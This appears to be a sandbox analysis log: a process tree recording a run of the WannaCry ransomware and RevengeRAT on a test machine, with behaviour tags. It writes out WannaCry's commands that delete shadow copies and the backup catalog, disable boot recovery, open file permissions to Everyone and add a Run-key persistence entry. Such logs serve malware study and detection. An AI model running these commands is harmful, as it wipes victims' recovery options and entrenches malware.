                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
                                                                                        2⤵
                                                                                          PID:4800
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 /prefetch:8
                                                                                          2⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:460
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
                                                                                          2⤵
                                                                                            PID:5768
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7524 /prefetch:1
                                                                                            2⤵
                                                                                              PID:5208
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
                                                                                              2⤵
                                                                                                PID:5104
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:2180
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:3172
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8300 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:2364
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7680 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:5720
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:2464
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7384 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:2276
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:5528
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8644 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:3436
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:3012
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8736 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:2736
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:3596
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7857395503563433242,15092601141436405711,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9204 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:1796
                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:4148
                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:2848
                                                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                                                        C:\Windows\system32\AUDIODG.EXE 0x498 0x304
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5668
                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:5580
                                                                                                                        • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\WannaCry.EXE
                                                                                                                          "C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\WannaCry.EXE"
                                                                                                                          1⤵
                                                                                                                          • Drops startup file
                                                                                                                          • Sets desktop wallpaper using registry
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1520
                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                            attrib +h .
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Views/modifies file attributes
                                                                                                                            PID:5548
                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                            icacls . /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3824
                                                                                                                          • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                            taskdl.exe
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4772
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c 114191728143362.bat
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3696
                                                                                                                            • C:\Windows\SysWOW64\cscript.exe
                                                                                                                              cscript.exe //nologo m.vbs
                                                                                                                              3⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4620
                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                            attrib +h +s F:\$RECYCLE
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Views/modifies file attributes
                                                                                                                            PID:5772
                                                                                                                          • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:5340
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\TaskData\Tor\taskhsvc.exe
                                                                                                                              TaskData\Tor\taskhsvc.exe
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:4084
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /c start /b @[email protected] vs
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5772
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:3828
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                                                4⤵
                                                                                                                                  PID:2728
                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                    wmic shadowcopy delete
                                                                                                                                    5⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:5616
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                              taskdl.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4732
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4512
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Sets desktop wallpaper using registry
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:1244
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "oefimrcpcbg941" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\tasksche.exe\"" /f
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:5848
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "oefimrcpcbg941" /t REG_SZ /d "\"C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\tasksche.exe\"" /f
                                                                                                                                3⤵
                                                                                                                                • Adds Run key to start application
                                                                                                                                • Modifies registry key
                                                                                                                                PID:5164
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                              taskdl.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3280
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:5328
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:6128
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:3736
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                              taskdl.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:212
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:992
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:2708
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                              taskdl.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4020
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:5912
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:772
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                              taskdl.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4512
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:5936
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:2768
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                              taskdl.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1892
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:5204
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:3908
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                              taskdl.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:3576
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:5300
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:5932
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                              taskdl.exe
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5292
                                                                                                                            • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskse.exe
                                                                                                                              taskse.exe C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
                                                                                                                              2⤵
                                                                                                                                PID:6244
                                                                                                                              • C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\taskdl.exe
                                                                                                                                taskdl.exe
                                                                                                                                2⤵
                                                                                                                                  PID:7992
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat" "
                                                                                                                                1⤵
                                                                                                                                  PID:6128
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat" "
                                                                                                                                  1⤵
                                                                                                                                    PID:3580
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat" "
                                                                                                                                    1⤵
                                                                                                                                      PID:3840
                                                                                                                                    • C:\Windows\System32\NOTEPAD.EXE
                                                                                                                                      "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\114191728143362.bat
                                                                                                                                      1⤵
                                                                                                                                        PID:4880
                                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3512
                                                                                                                                      • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe
                                                                                                                                        "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\RevengeRAT.exe"
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5524
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                          2⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5964
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:5544
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dwn_s9c7.cmdline"
                                                                                                                                            3⤵
                                                                                                                                              PID:6900
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7579.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6721FD667E9419683F1B72DB5B65D.TMP"
                                                                                                                                                4⤵
                                                                                                                                                  PID:4032
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ziet5enf.cmdline"
                                                                                                                                                3⤵
                                                                                                                                                  PID:7356
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES777C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF3792E12D71B4AAB869775C026276BDF.TMP"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:7548
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s-dem-n3.cmdline"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3292
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7847.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc57F27A776382403197F448C10EFCE8E.TMP"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:7812
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\s_uvtyxp.cmdline"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6044
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78E4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFDC1EC8FA45A4ABBB572895E4C3F66B4.TMP"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:6420
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q614avzi.cmdline"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6528
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7970.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc42311B16FC5B49318CD1B7A0B66D315F.TMP"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:1272
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w2sk2dj5.cmdline"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6696
                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79DE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc86B6A653E7164AA89477412459388C77.TMP"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:6804
                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lprpt8jw.cmdline"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6236
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A99.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc25D1644363454DE1B58BEF917A5DF3B7.TMP"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:6148
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9-cek1oy.cmdline"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:6912
                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
